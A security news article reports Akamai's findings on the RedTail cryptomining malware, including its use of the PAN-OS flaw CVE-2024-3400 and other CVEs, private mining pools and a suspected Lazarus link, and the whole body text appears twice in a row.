Experts have already suggested which hacker group may be behind the spread of the malware.
The attackers behind the RedTail malware have added a newly discovered vulnerability in Palo Alto Networks ' firewalls to their attack arsenal. As a result of the updates, the malware now includes new techniques for protecting against analysis, which is confirmed by experts from Akamai, a company specializing in web infrastructure and security.
Security experts Ryan Barnett, Steve Kupchik and Maxim Zavodchik noted in their technical report that the attackers took a step forward by using private cryptocurrency mining pools to gain more control over the results of mining, despite the increased operational and financial costs.
The attack begins by exploiting a vulnerability in the PAN-OS with the identifier CVE-2024-3400, which allows an unauthorized attacker to execute arbitrary code with superuser rights on the firewall. After a successful hack, commands are executed to download and run a bash script from an external domain, which then downloads the RedTail malware depending on the processor architecture.
RedTail also uses other distribution mechanisms, exploiting known vulnerabilities in TP-Link (CVE-2023-1389), ThinkPHP (CVE-2018-20062), Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887) routers, as well as VMware Workspace ONE Access and Identity Manager (CVE-2022-22954).
The first mention of RedTail came in January 2024, when security researcher Patrick Mahowiak documented a campaign exploiting the Log4Shell vulnerability (CVE-2021-44228) to inject malware on Unix-based systems.
In March 2024, Barracuda Networks revealed details of cyberattacks exploiting vulnerabilities in SonicWall (CVE-2019-7481 ) and Visual Tools DVR (CVE-2021-42071) for installing variants of the Mirai botnet, as well as flaws in ThinkPHP for deploying RedTail.
The latest version of the miner, revealed in April, includes significant updates such as the encrypted configuration used to run the built-in XMRig miner. The instance also lacks a hard-coded cryptocurrency wallet, which may indicate that attackers have switched to private mining pools or proxy pools.
Experts noted that the latest malware configuration shows the desire of attackers to optimize the mining process, including through the use of advanced evasion and stability techniques. All this shows that hackers have a deep understanding of the principles of cryptomining.
Akamai described RedTail as high-quality malware, which is rare among cryptocurrency mining families. The exact identities of the attackers are still unknown, but the use of private mining pools is similar to the tactics used by the North Korean group Lazarus, which is known for large-scale cyber attacks for financial gain.
The attackers behind the RedTail malware have added a newly discovered vulnerability in Palo Alto Networks ' firewalls to their attack arsenal. As a result of the updates, the malware now includes new techniques for protecting against analysis, which is confirmed by experts from Akamai, a company specializing in web infrastructure and security.
Security experts Ryan Barnett, Steve Kupchik and Maxim Zavodchik noted in their technical report that the attackers took a step forward by using private cryptocurrency mining pools to gain more control over the results of mining, despite the increased operational and financial costs.
The attack begins by exploiting a vulnerability in the PAN-OS with the identifier CVE-2024-3400, which allows an unauthorized attacker to execute arbitrary code with superuser rights on the firewall. After a successful hack, commands are executed to download and run a bash script from an external domain, which then downloads the RedTail malware depending on the processor architecture.
RedTail also uses other distribution mechanisms, exploiting known vulnerabilities in TP-Link (CVE-2023-1389), ThinkPHP (CVE-2018-20062), Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887) routers, as well as VMware Workspace ONE Access and Identity Manager (CVE-2022-22954).
The first mention of RedTail came in January 2024, when security researcher Patrick Mahowiak documented a campaign exploiting the Log4Shell vulnerability (CVE-2021-44228) to inject malware on Unix-based systems.
In March 2024, Barracuda Networks revealed details of cyberattacks exploiting vulnerabilities in SonicWall (CVE-2019-7481 ) and Visual Tools DVR (CVE-2021-42071) for installing variants of the Mirai botnet, as well as flaws in ThinkPHP for deploying RedTail.
The latest version of the miner, revealed in April, includes significant updates such as the encrypted configuration used to run the built-in XMRig miner. The instance also lacks a hard-coded cryptocurrency wallet, which may indicate that attackers have switched to private mining pools or proxy pools.
Experts noted that the latest malware configuration shows the desire of attackers to optimize the mining process, including through the use of advanced evasion and stability techniques. All this shows that hackers have a deep understanding of the principles of cryptomining.
Akamai described RedTail as high-quality malware, which is rare among cryptocurrency mining families. The exact identities of the attackers are still unknown, but the use of private mining pools is similar to the tactics used by the North Korean group Lazarus, which is known for large-scale cyber attacks for financial gain.
